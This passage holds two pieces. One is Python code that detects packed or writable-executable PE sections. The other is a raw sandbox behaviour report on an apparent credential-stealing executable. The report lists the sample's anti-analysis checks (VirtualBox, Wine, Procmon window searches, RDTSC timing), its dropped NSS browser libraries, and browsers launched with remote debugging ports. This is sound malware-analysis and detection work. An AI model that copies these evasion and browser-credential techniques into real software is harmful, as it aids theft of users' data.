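        # tiny sections compress badly for innocent reasons, so require some bulk
        return self.raw_size >= 1024 and self.zlib_complexity > PACKED_THRESHOLD


def render_name(raw: bytes) -> Tuple[str, bool]:
    """Render a section name, escaping anything outside printable ASCII (the report shows such names as blank)."""
    raw = raw.rstrip(b"\0")
    special = any(not 0x20 < b < 0x7F for b in raw)
    return "".join(chr(b) if 0x20 < b < 0x7F else "\\x%02x" % b for b in raw), special


def zlib_complexity(data: bytes) -> float:
    """Joe-style 'ZLIB complexity': compressed size over raw size; ~1.0 means incompressible."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def parse_sections(pe: bytes) -> List[SectionInfo]:
    """Walk the section table without pefile: MZ -> e_lfanew -> COFF -> optional header -> sections."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    size_opt, = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + size_opt
    out = []
    for i in range(num_sections):
        (name, _vsize, _va, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from(SECTION_HDR, pe, table + 40 * i)
        data = pe[raw_ptr:raw_ptr + raw_size]
        rendered, special = render_name(name)
        out.append(SectionInfo(rendered, len(data), zlib_complexity(data), special,
                               bool(chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE)))
    return out


def findings(pe: bytes) -> List[str]:
    """Report-style lines for the three indicators."""
    out = []
    for s in parse_sections(pe):
        if s.special_name:
            out.append(f"section name with special chars: '{s.name}'")
        if s.packed_like:
            out.append(f"section {s.name}: ZLIB complexity {s.zlib_complexity:.4f} (likely packed/encrypted)")
        if s.writable_executable:
            out.append(f"section {s.name}: writable and executable (in-place unpacking stub candidate)")
    return out


def _align(n: int, a: int) -> int:
    return (n + a - 1) // a * a


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for a packed payload."""
    out, h = bytearray(), b"constructed-seed"
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_sample_pe(sections) -> bytes:
    """Build a minimal PE32 from (name, data, characteristics) triples. Constructed test image, not the sample."""
    e_lfanew, size_opt, file_align = 0x40, 0xE0, 0x200
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    raw_ptr = _align(e_lfanew + 4 + len(coff) + size_opt + 40 * len(sections), file_align)
    table, blobs, va = b"", b"", 0x1000
    for name, data, chars in sections:
        raw_size = _align(len(data), file_align)
        table += struct.pack(SECTION_HDR, name, len(data), va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va = _align(va + raw_size, 0x1000)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return headers.ljust(_align(len(headers), file_align), b"\0") + blobs


SAMPLE_SECTIONS = [  # constructed: one ordinary section, one packed RWX section, one unprintable name
    (b".text", bytes(range(256)) * 16, 0x60000020),
    (b"cndowtni", _pseudo_random(8192), 0xE0000040),
    (b"\x01\x02.\x7f", b"\0" * 512, 0xC0000040),
]

if __name__ == "__main__":
    for line in findings(build_sample_pe(SAMPLE_SECTIONS)):
        print(line)
```

The ratio is cheap enough to run over every section of every new binary; in triage it pairs well with the W+X check, because an unpacking stub usually needs its own section to be both writable (to decrypt into) and executable (to jump into), which is exactly what "changes PE section rights" later confirms at runtime.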
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C537030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C537030
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\V21DG4G0.htm Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: h4ZgewNxoj.exe, 00000000.00000003.2359316515.00000000055FD000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000003.2231599583.0000000005609000.00000004.00000020.00020000.00000000.sdmp, CAEHJEBKFCAKKFIEHDBF.0.dr, JKFHIIEHIEGDHJJJKFII.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: h4ZgewNxoj.exe Virustotal: Detection: 41%
Source: h4ZgewNxoj.exe ReversingLabs: Detection: 71%
Source: h4ZgewNxoj.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\h4ZgewNxoj.exe "C:\Users\user\Desktop\h4ZgewNxoj.exe"
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2148,i,4031852269897719072,16253759926837054816,262144 /prefetch:8
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2200,i,8281646957936742168,7994800533158010306,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2000,i,13819835944976493745,13060883091540873233,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Google Drive.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: h4ZgewNxoj.exe Static file information: File size 1775616 > 1048576
Source: h4ZgewNxoj.exe Static PE information: Raw size of cndowtni is bigger than: 0x100000 < 0x197400
Source: Binary string: mozglue.pdbP source: h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Unpacked PE file: 0.2.h4ZgewNxoj.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cndowtni:EW;utdrbhcl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cndowtni:EW;utdrbhcl:EW;.taggant:EW;
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C53C410
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: h4ZgewNxoj.exe Static PE information: real checksum: 0x1b80fa should be: 0x1bc0c5
Source: h4ZgewNxoj.exe Static PE information: section name:
Source: h4ZgewNxoj.exe Static PE information: section name: .idata
Source: h4ZgewNxoj.exe Static PE information: section name:
Source: h4ZgewNxoj.exe Static PE information: section name: cndowtni
Source: h4ZgewNxoj.exe Static PE information: section name: utdrbhcl
Source: h4ZgewNxoj.exe Static PE information: section name: .taggant
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50B536 push ecx; ret 0_2_6C50B549
Source: h4ZgewNxoj.exe Static PE information: section name: cndowtni entropy: 7.954230799311721
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: Filemonclass
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5355F0

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD10F second address: ADD113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD435 second address: ADD450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDFF9160A30h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD450 second address: ADD45F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE0B1B second address: AE0B2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE0B2A second address: AE0B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE0B30 second address: AE0B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE0B34 second address: AE0B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE108E second address: AE1094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE122D second address: AE1261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jg 00007FDFF8F79156h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FDFF8F79166h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDFF8F7915Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE80A4 second address: AE80B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FDFF9160A26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE80B1 second address: AE80CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79162h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE8328 second address: AE8340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A32h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE8340 second address: AE835E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FDFF8F79156h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jne 00007FDFF8F79156h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push edx 0x00000016 ja 00007FDFF8F79156h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE848D second address: AE84AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDFF9160A2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jng 00007FDFF9160A26h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE84AC second address: AE84C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79162h 0x00000009 rdtsc
